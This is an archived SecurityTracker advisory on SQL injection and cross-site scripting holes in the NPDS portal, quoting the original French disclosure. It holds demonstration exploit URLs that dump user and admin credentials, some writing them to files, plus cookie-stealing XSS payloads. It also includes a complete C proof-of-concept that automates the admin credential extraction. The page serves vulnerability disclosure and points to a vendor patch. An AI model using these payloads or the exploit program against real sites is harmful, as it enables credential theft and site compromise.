Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
NPDS Input Validation Holes in 'glossaire' Module and Links Search Script Permit SQL Injection
|
|
SecurityTracker Alert ID: 1014073
|
|
SecurityTracker URL: http://securitytracker.com/id?1014073
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 29 2005
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Description: NoSP and Romano reported several vulnerabilities in NPDS. A remote user can inject SQL commands. A remote user can conduct cross-site scripting attacks.
Several scripts do not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute
SQL commands on the underlying database.
The '/modules/glossaire/glossaire.php' script (which is not installed by default) does
not properly validate user-supplied input in the 'terme' variable. Some demonstration exploit URLs are provided:
http://[target]/modules.php?ModPath=glossaire&ModStar
t=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,
http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_term
e&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,
The 'links.php?op=search' script does not properly validate
user-supplied input in the 'query' parameter. Some demonstration exploit URLs are provided:
http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,un
ame,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'
http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20
FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/va
A remote user can also create a specially crafted URL that, when loaded
by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from
the site running the NPDS software and will run in the security context of that site. As a result, the code will be able to access
the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by
the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs
are provided:
http://[target]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>
http://[target]/npds/powerpack_f.php?language=<script>aler
t()</script>
http://[target]/npds/sdv_infos.php?sitename=<script>alert()</script>
http://[target]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>
http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>
http://[target]/reviews.php?op=postcomment&id=1&title=%
3Cscript%3Ealert();%3C/script%3E
The 'reply.php' script does not properly validate user-supplied input in the 'image_subject'
parameter. A remote user can inject scripting code that will be permanently retained on the system.
http://[target]/reply.php?post=1&forum=1&topic=1&stop=2&image_sub
ject="><script>alert('je viens de recuperer ton
cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider
|
Impact: A remote user can execute SQL commands on the underlying database.
A remote user can access the target user's cookies (including
authentication cookies), if any, associated with the site running the NPDS software, access data recently submitted by the target
user via web form to the site, or take actions on the site acting as the target user.
|
Solution: The vendor has issued a patch, available at:
http://www.npds.org/download.php?op=geninfo&did=115
|
Vendor URL: www.npds.org/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: NoSP <NoSP@thehackademy.net>
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 28 May 2005 11:35:41 +0200
From: NoSP <NoSP@thehackademy.net>
Subject: NPDS Input validation holes, Xss & SQL Injection
|
Script :
********
NPDS est un système de portail écrit en PHP/MySQL. Il est sous license
GNU/GPL.
http://www.npds.org
Version : Toutes sauf la dernière SABLE
Problème :
**********
- XSS Non permanent
- XSS permanent
- SQL injection (récupération des login et pass des membres)
Détails :
*********
1) XSS non permanent :
----------------------
Il suffit de faire :
http://[site]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>
http://[site]/npds/powerpack_f.php?language=<script>alert()</script>
//idem pr push.php
http://[site]/npds/sdv_infos.php?sitename=<script>alert()</script>
http://[site]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>
http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<
script>alert()</script>
http://[site]/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();
%3C/script%3E
2) XSS permanent :
------------------
La variable $image_subject de la page reply.php n'est pas filtrée pour bloquer
certaines balises dangeureuses.
http://[site]/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><scr
ipt>alert('je
viens de recuperer ton
cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&
submit=Valider
3) SQL Injection :
------------------
- Page /modules/glossaire/glossaire.php
La table sql "glossaire" du module doit être installée (ce qui n'est pas le
cas par défaut !).
La variable $terme subit un stripslashes() et agit directement dans le
mysql_query() ce qui est très dangereux, voici 2 exploits possibles :
http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&t
erme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20users%20where%20unam
e<>''/*
Vous verrez afficher les login/pass de tout les membres sur la page
glossaire.php !
http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&t
erme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,aid,pwd,0,0%20from%20authors%20where%20name<>
''/*
Vous verrez afficher les login/pass de tout les ADMIN sur la page
glossaire.php !
- Page links.php?op=search
Ici, c'est le même problème que la précédente injection.
2 exploits :
http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM
%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sqlinjection.txt'/*
Créera un fichier texte avec le contenu de la table users (identifiants
membres).
http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20
authors%20where%20aid<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sauvegarde.txt'/*
Créera un fichier texte avec le contenu de la table authors (identifiants
admin).
Sécurisation :
**************
Mettre à jour sa version par la SABLE
ou
Appliquer le patch correctif pour Narval :
http://www.npds.org/download.php?op=geninfo&did=115
Proof of concept SQL injection links.php :
******************************************
#include<string.h>
#include<netdb.h>
#include<stdio.h>
#include<stdlib.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
/*Port HTTP*/
#define PORT 80
#define MAXLEN 4096
main(int argc, char *argv[]){
if ((argc != 2) || (strlen(argv[1])>=256))
{
printf( "\n");
printf( "-----------------------------------------------------------------\n");
printf( " Xploit_NPDS-Narval\n");
printf( " NPDS Remote SQL Injection Proof of concept\n");
printf( " Vulnerability discovered && Exploit coded by \n");
printf( " Romano <romano_45_at_hotmail_dot_com> &&\n");
printf( " NoSP <NoSP_at_thehackademy_dot_net>\n");
printf( " Usage: ./Xploit_npds_5.0 <server> or <ip>\n");
printf( " ex : ./Xploit_npds_5.0 127.0.0.1 or\n");
printf( " ./Xploit_npds_5.0 localhost or\n");
printf( " ./Xploit_npds_5.0 www.site.com/npds\n");
printf( "-----------------------------------------------------------------\n");
exit(1);
}
/*define variable*/
int fd;
char *fin_cut;
char *deb_cut;
char dossier[512];
char path_disclosure[4096];
char recept[1024];
char path[2048];
char sql_inject[4096];
char envoi[]="non";
/*Decoupage si npds n'est pas à la racine*/
if(strstr(argv[1],"/")){
deb_cut=strstr(argv[1],"/")+strlen("/");
strncpy(dossier,"/",strlen("/"));
strncat(dossier,deb_cut,strlen(deb_cut));
strncat(dossier,"/",strlen("/"));
/*On coupe le nom de domaine*/
fin_cut=strstr(argv[1],"/");
*fin_cut='\0';
}else{
strncpy(dossier,"/",strlen("/"));
}
/*Création de la socket*/
if((fd=socket(AF_INET,SOCK_STREAM,0))==1 ){
perror("Impossible de se connecter au serveur. Vérifiez l'adresse, elle doit
être sous la forme 159.125.45.21 ou www.site.com");
exit(EXIT_FAILURE);}
/*Define structure sockaddr_in*/
struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(PORT);
addr.sin_addr.s_addr=inet_addr(argv[1]);
memset(&(addr.sin_zero),'\0',8);
/*Connexion et éventuellement résolution de nom de domaine*/
if( addr.sin_addr.s_addr!=-1){
if(connect(fd,(struct sock_addr *)&addr,sizeof(struct sockaddr))==-1){
perror("Impossible de se connecter au serveur. Vérifiez l'adresse, elle doit
être sous la forme 159.125.45.21 ou www.site.com");
exit(EXIT_FAILURE);
}
}else{
/*résolution de nom de domaine*/
struct hostent *hp;
if(hp=gethostbyname(argv[1])){
bcopy( (char *) hp->h_addr_list[0],(char
*)&(addr.sin_addr),sizeof(addr.sin_addr) );
if(connect(fd,(struct sock_addr *)&addr,sizeof(struct sockaddr))==-1){
perror("Impossible de se connecter au serveur. Vérifiez l'adresse, elle doit
être sous la forme 159.125.45.21 ou www.site.com");
exit(EXIT_FAILURE);
}
}else{ printf("Désolé, nom de domaine introuvable\n");exit(1);}
}
/*On crée la requête dans la variable path_disclosure qui va nous servir à
récupérer le $PATH du site*/
strncpy(path_disclosure,"GET ",strlen("GET "));
strncat(path_disclosure,dossier,strlen(dossier));
strncat(path_disclosure,"modules/links/admin/links.php HTTP/1.1\r\nHost:
",strlen("modules/links/admin/links.php HTTP/1.1\r\nHost: "));
strncat(path_disclosure,argv[1],strlen(argv[1]));
strncat(path_disclosure,"\r\nConnection:
Keep-Alive\r\n\n",strlen("\r\nConnection: Keep-Alive\r\n\n\0"));
/*Et on l'envoie*/
if(send(fd,path_disclosure,strlen(path_disclosure),0)){printf("Recherche de
$PATH du site.....\n");}
/*reception et traitement des messages*/
while(recv(fd,recept,1024,0)){
/*Récupération du $PATH & fabrication de la requête*/
if(strstr(recept,"_error() in <b>") && strstr(recept,"/modules/")
){
deb_cut=strstr(recept,"_error() in <b>")+strlen("_error() in <b>")
;
fin_cut=strstr(recept,"modules/");
*fin_cut='\0';
strncpy(path,deb_cut,strlen(deb_cut));
printf("$PATH récupéré.................\n%s\n",path);
strncpy(envoi,"oui",strlen("oui"));
}else{
printf("Désolé, impossible de récupérer le $PATH\n");
exit(1);
}
if(strstr(envoi,"oui")){
/*On crée la requête dans la variable sql_inject qui va nous permettre de
créer le fichier Authors.txt contenant les pass admin*/
strncpy(sql_inject,"GET ",strlen("GET "));
strncat(sql_inject,dossier,strlen(dossier));
strncat(sql_inject,"/links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0
,0%20FROM%20authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'",
strlen("/links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20
authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'"));
strncat(sql_inject,path,strlen(path));
strncat(sql_inject,"Authors.txt'/* HTTP/1.1\r\nHost:
",strlen("Authors.txt'/* HTTP/1.1\r\nHost: "));
strncat(sql_inject,argv[1],strlen(argv[1]));
strncat(sql_inject,"\r\nConnection:
Keep-Alive\r\n\n\0",strlen("\r\nConnection: Keep-Alive\r\n\n\0"));
/*Et on l'envoie au site, créant ainsi le fichier Authors.txt*/
if(send(fd,sql_inject,strlen(sql_inject),0)){
printf("SQL Injection..................\nCréation du fichier
http://%s%sAuthors.txt\n",argv[1],dossier);
exit(1);
}else{
printf("Désolé impossible de créer le fichier\n");
exit(1);
}
}
bzero(recept,MAXLEN);
bzero(path,MAXLEN);
bzero(sql_inject,MAXLEN);
bzero(path_disclosure,MAXLEN);
}
close(fd);
return 0;
}
Crédits :
*********
NoSP <nosp@thehackademy.net>
Romano <romano_45@hotmail.com>
Nous tenons à remercier Philippe alias Developpeur pour sa bonne réaction et
sa correction rapide ;)
|
|
Go to the Top of This SecurityTracker Archive Page
|
